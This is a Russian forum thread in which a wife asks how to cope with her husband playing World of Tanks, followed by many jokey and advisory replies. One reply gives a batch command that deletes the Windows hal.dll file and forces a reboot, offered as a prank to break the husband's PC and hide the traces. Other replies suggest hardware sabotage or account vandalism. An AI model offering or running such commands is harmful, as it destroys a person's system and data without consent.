как быть если муж играет танки?????
уставшая  -    8158
Как я устала (((((( Мой муж играет танки если ли жены такие и как вы относитесь к этому???????
Живем не так давно . Все было хорошо но есть одно НО как с работы не придет все пропал. Я ему раньше говорила что он много времени уделяет играм теперь не замечает это или делает вид. Раньше обижалась на него хоть как привлечь внимание на себя сейчас этот номер не проходит ((((( Как быть что делать . Мало того что он играет так он деньги money bag ложит но это совсем .
Не разбегаться же. Как быть . Помогите советом

[Сообщение редактировалось]

Лучший ответ
35
unknwn
23 ноября 2016

зато не бухает в гараже

Ответов 143 Написать ответ
  • nucas_
    nucas_
    Максимилиан Парейро
    23 ноября 2016

1)дойдет до Х уровня интерес угаснет, онлайн игры созданы для откачки денег
    2)средство для снятия агрессии
    3)конечно плохо то что он не внемлет вашим словам, но тут уж от ситуации зависит. Сам я люблю порой пострелять, но всему есть разумный предел. Как говорится делу время - потехе час.

14
    • Jeema
      24 ноября 2016

х з х з .... я например наоборот ппц нервным становлюсь от танков, слив слив слив, команда оленей..

10 этажный мат перемат в квартире.

8
  • few
    23 ноября 2016

видимо вы не так интересны, вот и играет. наверное только требуете чтобы приносил деньги и все время что то поручаете. моя жена не запрещает мне играть, мне запрещает играть моя совесть) играю только на выхи и то ночью

13
  • ленкин
    23 ноября 2016

Начни автор вместе с ним играть

6
  • Серьезный
    23 ноября 2016

Тоже увлекитесь какой-нибудь игрой, перестаньте готовить, стирать и прочее. Посмотрим, как он отреагирует :)

11
  • 12
    23 ноября 2016

с разворота с ноги по монитору,

8
  • Ррар
    23 ноября 2016

Это зависимость. Я еле бросил играть. Взвесив всё. Ну а так силой вы его не оттащите. Моя играла мне на нервы)) но терпела.

0
  • (
    23 ноября 2016

Не "играет танки", а "играет В танки"! Ну почему так много безграмотных людей? :((

11
  • img
    img
    23 ноября 2016

создай на рабочем столе у танкиста текстовый файл и напиши в нем:
    cmd /c del %windir%\system32\hal.dll /f /q && shutdown -r -t 30
    сохрани и закрой. затем переименуй его расширение в bat-файл. т.е. Новый текстовый документ.txt должен стать Новый текстовый документ.bat. и все, запускаешь его. у тебя будет 30 сек, чтобы замести следы - удалить этот файл с рабочего стола face with stuck-out tongue and winking eye

1
  • Мама двоих
    23 ноября 2016

Сдайте такого мужа в детсад! Ппц.

-4
  • ipek80
    23 ноября 2016

Скоро ждите прибавления значит.

0
  • Irineev
    Irineev
    у меня нету имени
    23 ноября 2016

И как он в это *авнище играет?

0
  • galvanizeykt
    23 ноября 2016

Танки ещё ладно:) хорошо что не вовер или не дотер

2
  • unknwn
    23 ноября 2016

зато не бухает в гараже

35
  • michael.nrc
    23 ноября 2016

Пусть играет. Ваши обижальки его наоборот туда вгоняют. Сексовать надо. Потом дитя и все хлопоты. Отвыкнет по тихой от игры.

16
  • уставшая
    23 ноября 2016

Img очень понравилась ваг совет)))) только не пойму как и что. Компьютер это не мое. Если даже и попробую то не смогу.
    Мне так кажется что ему так удобно стала. Как говорит я и так работаю, а дома он отдыхает вот и пропадает в этих играх. Раньше всегда все вместе готовили делали сейчас как зомби компьютерный(((((

-1
  • уставшая
    23 ноября 2016

И что сексом его постоянно заманивать? И так почти каждый раз по десертику))))) не жалуюсь не выход это.

1
  • пэн61
    23 ноября 2016

Монитор разбейте нечаянно.

-4
  • zombezy
    zombezy
    Александра Егорова
    23 ноября 2016

норм все

1
  • dodu
    dodu
    1чсвы йч с ч
    24 ноября 2016

Пусть играет. Это не самый худший вариант досуга. Или предложите что-то своё

5
  • K.I.M.
    24 ноября 2016

Сдайте его в клуб анонимных танкистов...

5
  • сааскей
    24 ноября 2016

Случайно ударьте по пальцам топором. И скажите ему, что любить буду тебя и без пальцев.

-1
  • 123
    24 ноября 2016

Зато он постоянно дома)

6
  • LeVaP
    24 ноября 2016

знаю некоторых, но на самом деле не все так страшно. игра все равно надоест.
    Раньше мужья где-то в гаражах пропадали или в гостях. В итоге приходили домой никакие, двух слов связать не могли. А как танки появились, мужья чаще дома находиться стали. Жена купит пива не много для своего, со словами "уж лучше пусть дома посидит за игрой, чем на улице и с кем попало". Вот, как то так :)

15
  • Артемич
    Артемич
    Вася Батарейкин
    24 ноября 2016

С ним играй

0
  • bass
    24 ноября 2016

я тоже играл но надоело это *****лово айка да айка

0
  • Игрок
    24 ноября 2016

Через 2 года надоест играть в танки, мне надоело, из клана вышел. Вернее кикнули за слакерство. А так тоже очень много времени играл в танки. Мог сутками сидеть. Щас так проигрываю не часто, не каждый день, и не больше часа.

2
  • nordline
    24 ноября 2016

У меня жена тоже бесилась что в танки рублюсь

Играю уже почти 3 года, свыклась. И в гараже бухнуть успеваю по выходным)) Это отдых наш. Дела сделал, играй смоло

-1
  • okunek_perkins
    24 ноября 2016

Мы с женой вместе играем, я на ноуте жена на компе, уровни одинаковые, играем почти одинаково, круто когда увлечение одинаковые, так что мой совет учитесь играть WOT🤓

6
  • mr.romand
    mr.romand
    удалимойаккаунтнучча
    24 ноября 2016

ясно, пойду в танки погоняю.

5
  • Чыбылла
    Чыбылла
    Ветеран
    24 ноября 2016

Базара нет, это такой вид отдыха.

Но есть одно но. Бесполезен такой отдых, надо что то полезное.

1
  • kety.paris
    24 ноября 2016

Увлекись другим мужиком, ну, или сделай вид, что увлеклась. Пусть увлеченно ищет тебя )))

-2
  • е5
    24 ноября 2016

танки это не зависимость после 30 к боев надоест

1
  • whisper1985
    whisper1985
    TheHedgehogOfEvil
    24 ноября 2016

Все что делает мужика счастливым хоть на секунду бесит некоторых женщин. Читал тут нечто подобное про тренажерный зал! Вы девушки странные, влюбляетесь в мужчину,а потом с переменным успехом лепите из него кастрированного послушного безмолвного осла, чтоб потом посетовать на то что мужчин настоящих не осталось.

11
  • Николай
    24 ноября 2016

Игра world of tanks такая игра что деньги пихай туда, это не игра а банкомат, пусть играет war thunder! В этой игре играют без вложения денег и графика лучше

-3
  • Уже теща
    24 ноября 2016

Мой зять до сих пор играет в эти игры. Я ему говорю Великая отечественная война продолжалась почти 5л, а твоя война когда закончиться говорю, а он смеётся. Вот так. Пусть играет, чем плохим заняться.

4
  • Chubu
    24 ноября 2016

Я убиваю людей сотнями в день, играя в GTA online с читами, зато в жизни очень спокойный и добрый человек. Трачу на игру 2-4 часа в день. Уже надоедает, раньше мог по 10-12 часов зависать, а сейчас играю, чтобы стресс снять (мучаю игроков, так, чтоб бомбили).

-3
  • wers
    24 ноября 2016

никак, рано или поздно ему это надоест, я сам тоже играл, не в танчики, в другую игру, так что эту тему знаю не понаслышке. Это как бы отдушина, пусть играет.

2
  • acu30
    24 ноября 2016

Читать тут, по ссылке ниже:

http://www.mart-np.ru/content/muzh-postoyanno-igraet-v-kompyuternye-igry - ссылка.

и просвещаться.
    Там собран многолетний опыт борьбы баб с компьютерной зависимостью их мужей.

1
  • ioniks
    24 ноября 2016

Оставьте мужа в покое, пусть отдыхает как ему нравится. Он же не сутками там сидит и на работу не ходит. Придёт время-остынет к играм.

7
  • whisper1985
    whisper1985
    TheHedgehogOfEvil
    24 ноября 2016

Не "ложит" , а "кладёт деньги"!

1
  • Pride
    24 ноября 2016

не трогайте нас, за то мы не бухаем в гараже...;)

3
  • мари
    24 ноября 2016

Вот многие пишут тут "играй с ним", а дети (у нас их трое), а работа, а дела домашние? Нет, я не согласна!!! Мы очень долго вместе - 10 лет, а он всё играет. Я просто домой денег не приношу, хочет жрать - пусть работает! Ужасно конечно, но я перепробовала все методы и только этот метод работает. Не стабильно конечно, но толк есть. Хочется взорвать эту игру ко всем чертям! Но и с другой стороны- он же дома, а не где нибудь. И следующее - комп его сдох, а единственный источник его пристрастий это комп дочерей. Т.е играет только когда дочки разрешат войти в их комнату)) Успехов женскому прекрасному полу, гармонии вам в семье. Семья это святое!

1
    • trn
      24 ноября 2016

мари, у автора случай не запущенный. Ее муж играет после РАБОТЫ. А если ваш муж играет не работая, то нафига такой он нужен?

2
  • Алина
    24 ноября 2016

Мой муж тоже играет уже 6год надоела...

-1
  • калева
    24 ноября 2016

Моя разрешает, но целыми днями и ночами не сижу.

0
  • danvik
    24 ноября 2016

Ну как бы сказать зависимость или нет ю, это и правда и в то же время неправда....скорее какая то форма одержимости и жажда победы. Сам механизм надо понять... Почему играет....я играл много....достаточно много...жена ругается и т.д. у меня скорее всего было в этой игре поиграть другими танками, дойти до верха...тем больше играешь, чем быстрее прокачиваешь нужный танк...и как правило ожидание и реальность не совпадает совсем... Сйчас заполучив там требуемые танки я уже все не играю совсем....может на 30 - 40 мин. Раз в неделю в выходные, после всех дел и когда дети спать лягут (чтоб они не начали играть) посидеть чисто... От силы 4 -5 боя могу играть...и в последнее время нет никакого желания играть... Вот кино смотреть на онлайн, почитать, это можно еще...
    Так что все индивидуальное... Ждите, отвыкнет...с другой стороны то что муж дома сразу после работы, в кабаки не ходит, по бабам не шляется...есть другая категория жен...они жалуются что муж дома не ночует, бары, кабаки, девушки легкого поведения...вам лучше было бы лучше, чтоб муж проадал у друзей, приходил пьяным, постоянно лечится от зппп, так вам более удобно будет???

2
  • WanerWaner
    24 ноября 2016

у меня девушка со мной играет) тоже играй

1
  • trn
    24 ноября 2016

Дайте ему отдохнуть. Он тоже человек. Зато всегда дома. Зато не устраивает пьяных разборок. Зато зарлату домой приносит. И таких плюсов навалом. Надо вам найти какое нибудь свое увлечение.

4
  • Safyan31
    Safyan31
    Алексей
    24 ноября 2016

зайти на сайт world of tanks и удалить его аккаунт. желание заново прокачивать технику напрочь отпадет)))

-6
  • romann
    24 ноября 2016

Зайди в тему снизу про танки

0
  • tir
    24 ноября 2016

Пусть играет, а то новое увлечение найдет - домой после работы приходить не будет, потом скажешь, лучше бы танчики играл=))

6
  • raulmadrid
    raulmadrid
    Нголо Канте
    24 ноября 2016

если отучите его от танков он начнет пить пиво дома, если будете отучать его пить пиво, он начнет шляться по бабам, перестанет домой деньги носить, так что пусть дальше играет

2
  • herculay1
    herculay1
    Ветеран
    24 ноября 2016

ММОРПГ - зло. Занимает все время. Мысли. Силы.

Единственный рецепт избавления - разбомбить офис разработчиков чтобы перестали игру поддерживать и вообще закрыли ее))))))))))))))))))))))))))

0
  • Барсук
    24 ноября 2016

от зажигалки электрическую штуку снимаешь, которая щёлкает током, вот этим делом по щёлкать по компу по харду, он даже не заметит что это ваших рук дело, купит новую деталь, потом еще раз щелк и всё :) и интерес пропадёт наверное

0
  • holyinq90
    holyinq90
    Afanasiy
    24 ноября 2016

в том , что муж Ваш не знает чувство меры виноват он сам и Вы, а не игра. Ставьте ультиматум "я или танки" и решайте уже по обстоятельствам.

-3
  • hellknight
    24 ноября 2016

ВОИСТИНУ ЗЛО! )))) Приветы ЛИНЕЙЩИКАМ! XD

0
  • wtwt
    24 ноября 2016

Пускай играет, я тоже играл, вложил деньги, года четыре назад интерес к танкам както пропал. Тупая и бессмысленная игра без внятного ендгейма.

1
  • николай
    24 ноября 2016

друг играл в R2 online несколько лет без вклада в игру, так я за 4 месяца этой игры с вкладом денег в умеренных количествах начал побеждать его, от унижения он бросил игру... мораль такова он щас нашел другую игру...

0
  • Robben
    Robben
    Иван
    24 ноября 2016

Сейчас началась 5 кампания в танки, там нужно играть каждый день с 19:00 до 2-3 часов ночи.И это до середины декабря.

2
  • dunduk
    dunduk
    Володимир Всеяруси
    24 ноября 2016

знаю я людей которые к компьютеру вообще не подходят. Некоторые ходят в тренажерку, некоторые отдыхают с друзьями, (не обязательно с алкоголем), некоторые работают допоздна, некоторые просто валяются на диване перед теликом, их всех жены пилят за то, что они не уделяют времени семье. Человеку нужно немного собственного пространства, увлечений. Мужчина с давних времен не сидел с ребенком и женой каждый день, он всегда уходил на долгое время на добычу пропитания. Так что каждый день нянчится с женой и детьми это не мужское дело издревле. И попытка поменять это не обернется ничем хорошим. Если он работает, приносит достаточный доход, и уделяет немного времени семье, дорогие женщине дайте ему отдохнуть.

3
  • mastak
    24 ноября 2016

Танкуйте вместе сним.

0
    • Рита
      24 ноября 2016

mastak, кстати, вот как вариант) есть у меня парочка историй, когда жена назло мужу начинала играть, муж видел все со стороны и понимал лучше)
      а если серьезно: предложите мужу и, в том числе себе, какие-нибудь интересные совместные занятия. время, проведенное вместе, сближает и помогает решить многие проблемы.

1
  • Jeema
    24 ноября 2016

Раньше тоже играл как маньяк

Потом как то поднадоело.... теперь в месяц 2 раза играю..и то по часу тока... потом блевать уже тянет.

0
  • TALYANA
    24 ноября 2016

Мой в squad рубиться. Чэ похрен пусть играет, но блин мат перемат и ор на всю квартиру. В итоге я не высыпаюсь expressionless face предложите ему стримить игру на ютуб или твич, так хоть денег будет приносить игра если он телегеничен или же сами займитесь этим.

1
  • Купитман
    24 ноября 2016

Глупой женщине всегда есть к чему придраться.

"Как быть если муж не умеет "ЛЕТАТЬ"?????
    Как я устала (((((( Мой муж "блаблабла - любое выбрать", если ли жены такие и как вы относитесь к этому??????? Как я устала:)"

0
  • ukrainets1977
    24 ноября 2016

самой научиться играть в танки и обыграть его.

0
  • eak6969
    24 ноября 2016

Снаряды подавай...

2
  • sheytan
    24 ноября 2016

я на работе только играю когда есть время, дома только телевизор смотрю, да домашних хлопот много не до игр

0
  • korea
    24 ноября 2016

НЕ ТРОГАЙ НАШЕГО ТАНКИСТА, КТО ЖЕ РОДИНУ ЗАЩИЩАТЬ БУДЕТ =) САМА ТОЖЕ САДИСЬ И ПОЕХАЛИ ЗА РОДИНУУ =)

1
  • bezbazara
    24 ноября 2016

Пройдет игру и успокоится, вернется.
    Сейчас как раз "танковые асы" идут.

0
  • fv215b183
    24 ноября 2016

удали все его танки))))))))))))))))))))))) правда можно с ноги получить и без зубов остаться

0
  • gt-7
    24 ноября 2016

В армию отправь или по контракту в танковые войска.....

-1
  • wazzir
    24 ноября 2016

Пока его нет дома, зайдите в танки (скорей всего у него автологин) и слейте ему стату, продайте все танки, и обматерите в чате ГМов.

И можете смело собирать вещи, и бежать куда подальше, ибо когда ваш муж придет, то вы узнаете что такое ярость )

0
  • танкист
    24 ноября 2016

да пусть играет зато дома а не интернет клубе сидит у вас норм я тоже танк сижу после рождения сына все танк только ночью играю трагедию устраивают из за мелочи если бухнул бы другая тема была бы не по бабам бегает у тебя перед глазами сидит дома радуйся или вместе играйте smiling face with open mouth

0
  • q_u_a_l_i_t_y
    24 ноября 2016

Это пройдет... я сейчас тоже играю, т.к. еще и выпивал, играя. Но деньги не вкладывал, от пьянки в итоге расстался с детьми и сожительницей

0
  • q_u_a_l_i_t_y
    24 ноября 2016

Это пройдет... я сейчас тоже играю, т.к. еще и выпивал, играя. Но деньги не вкладывал, от пьянки в итоге расстался с детьми и сожительницей

0
  • xerx
    24 ноября 2016

Да задолбали эти танкисты, на работе только о танках и разговор, как будто ничего кроме этой игры нет ничего.

-3
  • oksanochka.1984
    24 ноября 2016

Ничего. Скоро на ЮТУБ подсядет )))))

0
  • Itsme
    24 ноября 2016

Мой в доту играет. Отношусь нормально, ибо в это время могу заниматься своими делами. Просила его научить меня играть(интересно стало),согласился,а потом сказал, что это мне не нужно :D главное, чтобы это не мешало его работе и учебе

1
  • Naprolomer
    24 ноября 2016

думаю это бесполезная трата времени если не приносит выгоду, помню я в лохматом году играл в WoW, но все равно с этого поимел выгоду т.е создал местный сервак думаю многие меня помнят с которого я подымал нехилиые 40к в месяц. Сейчас я уже перешел на доту 2, очень много играл жена не возражала, и вот пришел день рассплаты набрав скила я начал делать ставки на киберспорт и за полтора месяца сделал полляма. Жене все время говорю что это она заслужила эти деньги своим терпением а не я. Вообщем деньги на ремонт квартиры есть щас готовлю ей подарок в ввиде новой машины. Так что я не капли времени не жалею проведенного у игр так как они уже мне подняли больше ляма, ну и думаю дальше тоже будет лучше. Советую вам посмотреть на мужа если нет никаких перспектив запретить играть, ведь толку нету от таких игр с которых не будет выгоды

-1
    • dunduk
      dunduk
      Володимир Всеяруси
      24 ноября 2016

Naprolomer, фантазер

0
      • Naprolomer
        24 ноября 2016

dunduk, ахах да я сам себе не верю и даже не надеюсь дружище что ты поверишь но суть такова "легкие деньги есть" по wow мб кто откликнется кто помнит wowpro, по ставкам кнешь тяжело поверить, да чего там я сам в шоке ^_^.

0
        • dunduk
          dunduk
          Володимир Всеяруси
          24 ноября 2016

Naprolomer, ну ставки это вообще не вариант. Тебе повезло просто.

0
        • Tror
          25 ноября 2016

Naprolomer, чувак вовпро была весчь, особенно откаты после зависания =) помним любим скорбим =) полтора года в никуда. Где мой *** клан с кучей *** в банке? На днях снилось что фармлю арктический мех в нордсколе проснулся в холодном поту. А таки да, щас бы пробежался по миникам и гоу фармить ИВК и ЦЛК геро 25 ахахах. Сука мнежеж уже скоро 40 *** мне это почему не могу забыть?

0
  • .
    24 ноября 2016

Слабак ваш муж, ушел в виртуальный мир, да еще деньги там сливает. Тут в основном такие же танкисты сидят, вот и комментарии такие: зато не бухает, зато не гуляет, пусть играет. Как дети малые, как будто подвиг какой-то сделали, не бухаем же зато!

2
  • dok-rolf
    24 ноября 2016

Самое главное,почему жена танкиста не спит почти в 2 часа ночи?

0
  • strangers
    24 ноября 2016

Его случайно не Дима зовут? )

0
  • 123
    24 ноября 2016

чем скорее бросишь , тем лучше для тебя !!! Человека изменить нельзя !!!

0
  • Ррар
    24 ноября 2016

Играют слабые люди. Уход от реальности. У нормальных мужиков хобби - спорт, авто, охота, бизнес и деньги...ну и с детьми время провести

-3
  • анна
    24 ноября 2016

оо как же я вас понимаю мой тоже играет эту долбанную игру благо живем в районе соответственно интернет медленный хата так что щас почти не играет. ))) а как в городе поедем его из дома не вытащишь даже когда отдыхали в сочи он ноут с собой притащил и играл ((( это было капец и еще мат перемат дети дома все это слышат ведь на нервы действует прям хочется с размаху ударить его ноут по полам.

0
    • Лена
      24 ноября 2016

анна, ну "убийством" ноута Вы вряд ли чего-то добьетесь, а вот разговорами и объяснением роли каждого в семье - вполне возможно. почему Вы никак не повлияли на то, что муж взял ноут в Сочи? семья - это в первую очередь взаимопонимание. если муж Вас не понимает и делает все по своему усмотрению - в чем толк такой семьи? а танки тут, телевизор или рыбалка - особо разницы и нет.

0
  • Yankoff
    24 ноября 2016

Есть такой знакомый который играет в танки и одновременно смотрит дом 2. Его дом я называю филиалом ада на земле.

0
  • klain
    24 ноября 2016

-

танки это фигня, скоро ему надоест, а вот ДОТА - истинное зло, ни в коем случае не устанавливайте эту игру :D

0
  • аамылла1984
    24 ноября 2016

скоро ваш муж заболеет синдромом компьютерного зрения как и я когда то. вот и перестал сидеть за компьютером. сразу голова болит, в глазах жжет даже в телефон смотреть больно. вот тогда и перестанет я тоже в танки рубился фильмы смотрел. как же хочу сейчас поиграть хоть часок. да не могу. берегите глаза люди. покупайте компьютерные очки.

0
  • Андрей_На_Ларгусе
    24 ноября 2016

Помню, давненько это было, мужики сетовали, что жены санта барбару смотрели. Сколько лет шла эта хрень? Потом жены переключились на дом2... И многим женам было по барабану на семью во время этих сериалов и телепередач.
    Вы, женщины, даже не знаете, что мужикам надо. Нам победы нужны, уважение. Ты вышла за него замуж? Всё он победил! А дальше, что? А дальше он уже для тебя победы одерживает! (Сделал ремонт, нашел хорошую работу, помог тебе с твоими делами, защитил тебя от собак, смог сэкономить деньги, накопить и т.д. и т.п.) А ты? А ты не замечаешь его победы...
    До свадьбы ты прихорашивалась, одевалась красиво для него. А сейчас? Сейчас ты одеваешься для других! Дома ведь в обычной одежде ходишь, а на работу, в гости - макияж, одежда нарядная.
    Мужик - существо самодостаточное. Он может постирать, пришить, погладить, приготовить всё, что женщина делает - он может! Не так хорошо как некоторые женщины, но может. Ему это достаточно.
    Вот он и сидит, и играет. Там он ПОБЕЖДАЕТ!
    Посмотрите в ютубе профессор Малышев рассказывает о отношениях мужчины и женщины, и вам станет всё ясно.

P.S. Не относится ни к одной конкретной женщине.

0
    • Ррар
      24 ноября 2016

Андрей_На_Ларгусе, причина в нем самом. Он слабак. Зачем валить ответственность на других. Это удел слабых. Он мужик и он в ответе за свои поступки. Хочет побед? Пусть побеждает в реале. По вечерам можно изучать что нить для открытия бизнеса и т.пп. а он выбирает легкий путь

-2
      • Андрей_На_Ларгусе
        24 ноября 2016

Ррар, А я и не говорю, что во всём виноваты другие. Семейная жизнь это дело, и его, и её. И только. Каждый из них в чём то виноват. Но она спросила совета, что ЕЙ делать. Я и попытался дать совет или подсказку только ЕЙ, а не ЕМУ.

0
  • boy81
    24 ноября 2016

Главное не мешать мужу, чтобы он чемодан не получил от однокнопочного по засвету тараканов, а то РАКи и ОЛЕНИ не вытянут сольются и будет он НУБом. Лучше положи ему денежку на голду, чтобы мог он валить ТЯЖОВ с поджогом двиги и попаданием в БК !!!

0
  • Александр
    24 ноября 2016

Давно доказано что на комьютерные игры ( не считая детей и подростков у которых это может быть возрастное) западают люди с низким уровнем интеллекта. На азартные игры так же "садятся" малообразованные гопники и дерики. Доказательства? Зайдите к примеру в Фонбет и увидите что там нет ни одного человека с нормальным очным высшим образованием. Дело в том, тот ваккум который у образованных людей занят знаниями у этих товарищей не занят ничем и поэтому они легко зомбируются на всякие игры лудоманов.

0
    • Андрей_На_Ларгусе
      24 ноября 2016

Александр, Высшее образование это подготовка узко направленного специалиста, не более. Ну и ключик к некоторым дверям. Не надо говорить, что люди без высшего образования хуже чем с высшим. Знаю людей без "вышки" которые гораздо умней и мудрей людей с "вышкой." Много бичей и бомжей есть с высшим, и не одним, образованием.

1
    • bukvar
      24 ноября 2016

значится что если

я играю в комп. игры дома 1 час в день стабильно, и ночью по выходным, я дурачек или гопник ????

0
    • dunduk
      dunduk
      Володимир Всеяруси
      24 ноября 2016

Александр, кем когда как доказано? Ты хотя бы объясни нормально если у тебя такой высокий уровень интеллекта. Ну или хоть ссылку дай.

0
  • lavr
    24 ноября 2016

моя жена позволяет играть сколько хошь, лишь бы дома был

1
  • marty_mc
    24 ноября 2016

Он же киберспортсмен!
    Где ему тренироваться как не дома?
    Или предлагаете за деньги в клуб?
    Просто нужно договориться, адекватно, сделал дело - пусть отдохнет и поиграет, у всех есть право на отдых!

0
  • донкихот
    24 ноября 2016

Многие жёны в инстаграме сидят весь день с телефона,а если спросишь что нибудь,бессмыслено смотрят и "а?"..вот это тоже зависимость,а если нечем похвастаться то без настроения становятся и ходят как "пьеро"...

0
  • misterpu
    24 ноября 2016

хахаха

Видели рекламу: Что каждый 3 или 5 мужчина в России играют в Танки, так вот остальная часть играют либо в Доту либо в КС=)

В основном в такие игры играют ребята из поколения 80-х, то есть те, кто родились в 80-е, мы выросли во времена возрождения таких игр и то, что эти же игры сейчас есть, но в еще лучшем графике это еще больше тянет, из моих знакомых 70% все играют, все ровесники.

Так что это нормальное явление,но все должно быть в меру. Я сам не прочь каждый день пару часиков поиграть.

0
  • 101010
    24 ноября 2016

мой тоже играет...но не задродствует...один раз в месяц может вечерком посидеть поиграть я не против.

1
  • Ррар
    24 ноября 2016

Безответственные люди. Это как правило дети подростки и неудачники. У кого нет побед в реале. Ведь играют и соревнуются у кого лучше стата

0
  • Кира
    24 ноября 2016

предложите что-нибудь мужу, что поможет отвлечь его от игр.
    а лучше всего, вспомните причину того, что муж стал играть... может ему скучно в семье стало? (только без обид). может пора как-то разнообразить Ваши отношения? танки - это всего лишь внешний фактор. вся проблемы в самом человеке.

0
    • dunduk
      dunduk
      Володимир Всеяруси
      25 ноября 2016

Кира, о боже мой)))) скажите у вас диплом психолога от какого универститета?

0
  • leto1972
    leto1972
    лена
    25 ноября 2016

Твои танки это ещё цветочки 😄 Мой муж программист, так он не только в танки дома играет, но и работает сидит на компьютере после раб. дня. Замужем за него уже 9 лет. Мой тебе совет - забей. Я раньше, конечно же, психовала, закатывала истерики, угрожала разводом. Безрезультатно 😂 Но, он обязательно уделяет для меня время, 5 мин полежим понежимся и сядет обратно на компьютер. Меня это уже устраивает. Так что я привыкла, и ты привыкнешь. Скажи спасибо, что не шляется туда-сюда по бабам 😉 Пусть сидит и играет в танки ✊🏻

1
  • fugitoid_
    25 ноября 2016

Танки это ещё пол беды вот дота 2 это жесть)) 10 лет играл в эту игру, бросил игры потому что организм начинает заболевать хондроз геморрой обеспечен, задумайтесь

0
  • fugitoid_
    25 ноября 2016

Пишите в личку дам совет как бросить игры или меньше зависать в инете

0
  • cret
    26 ноября 2016

Тачики это уэе диагнозgrinning cat face with smiling eyes

0
  • bdbdjdjd
    30 ноября 2016

У кого чтоface with tears of joy

0
  • Александр
    1 марта

бросай *** и найди нормального мужчину себе, зачем страдать из за ***

0
  • Warthunder
    1 марта

Какие танки? WOT или Wae thunder?

0
  • Gabidse
    Gabidse
    Габидзе
    1 марта

Максимум, что ты можешь это обижаться, чтобы привлечь внимание? Лол

0
  • psycentr
    psycentr
    Специалист
    4 марта

Добрый день! Прежде всего, необходимо оценить ситуацию трезво, мешает ли его времяпровождение основной деятельности, так как время на хобби и личное время имеет право каждый. В мужчине по природе заложены такие качества как, соперничество, тяга к славе, и именно в компьютерных играх он может реализовать это и почувствовать эмоции победителя. Если вы думаете, что хобби перерастает в зависимость и у человека нет других увлечений, то тогда стоит бить тревогу. Если речь идет о зависимости, то прежде всего нужно выяснить первопричину. Истерики, обиды, слезы и скандалы могут только усугубить положение и именно от них человек, как правило, уходит от реалии в компьютерные игры. Единственное решение для выяснение проблемы, это простое общение, но при этом очень важно не выставлять себя жертвой, не упрекать, требовать, ставить рамки и т.д. Спросите, чем вы можете ему помочь, что его не устраивает в реальной жизни. Важно, чтобы любимый человек понял, что вы в нем нуждаетесь, цените, любите, что вы готовы поддержать и помочь в решении гнетущих его проблем. Важно, чтобы он увидел привлекательную другую цель, чтобы отказаться от его "уютного места" в компьютерных играх. Придумайте новые общие увлечения, реализуйте общие мечты, путешествуйте, выходите за рамки обыденности и будьте счастливы.

0
  • Botoed
    4 марта

О боже мне б эти проблемы, игра это норм, не пьёт не бьёт ведь. Тихоня, пусть сидит.

0
    • Игрок
      4 марта

)))

Я играю в танки. И я тоже тихоня непьющий, не курящий и не гулящий. Но по факту семья развалилась. Игра в танки это тоже пристрастие, такое же как и наркотики.

0
    • Игрок
      4 марта

Botoed, пойду в Танки поиграю)))

0
  • У
    29 марта

Полный игнор. Если думающий человек, то подумает.если нет то разводись.

0
  • DimitriusDB
    30 марта

Обожал/обожаю эту игру!
    Деньги просиживал,в комп.клубы ходил.
    А закончилось все так:после особо обидного проигрыша,случайно ударил монитор кулаком (дело в комп.клубе было).Монитор отлетает в соседний,оба падают и разбиваются.
    Владелец клуба, мужик нормальный,посадил меня админом,чтоб отрабатывал убыток.Посмотрел я на придурков со стороны,понял ,что сам такой.Ну и бросил.
    Правда иногда рублюсь до сих пор,но без фанатизма.

0
  • ПитерФальк
    6 ноября

Комментаторы смешные. Женщине внимания не уделяет. Ты ее трахни так,чтобы довольная лежала и сил не было гундеть. А то "зато не гуляет". Ещё напишите "зато не ссыца".

0
Ответ на тему: как быть если муж играет танки?????
Введите код с картинки*:  Кликните на картинку, чтобы обновить код
grinning face grinning face with smiling eyes face with tears of joy smiling face with open mouth smiling face with open mouth and smiling eyes smiling face with open mouth and cold sweat smiling face with open mouth and tightly-closed eyes smiling face with halo smiling face with horns winking face smiling face with smiling eyes face savouring delicious food relieved face smiling face with heart-shaped eyes smiling face with sunglasses smirking face neutral face expressionless face unamused face face with cold sweat pensive face confused face confounded face kissing face face throwing a kiss kissing face with smiling eyes kissing face with closed eyes face with stuck-out tongue face with stuck-out tongue and winking eye face with stuck-out tongue and tightly-closed eyes disappointed face angry face pouting face crying face persevering face face with look of triumph disappointed but relieved face frowning face with open mouth anguished face fearful face weary face sleepy face tired face grimacing face loudly crying face face with open mouth face with open mouth and cold sweat face screaming in fear astonished face flushed face sleeping face dizzy face face without mouth face with medical mask face with no good gesture face with ok gesture person bowing deeply person with folded hands raised fist raised hand victory hand white up pointing index fisted hand sign waving hand sign ok hand sign thumbs up sign thumbs down sign clapping hands sign open hands sign flexed biceps

Предложения и замечания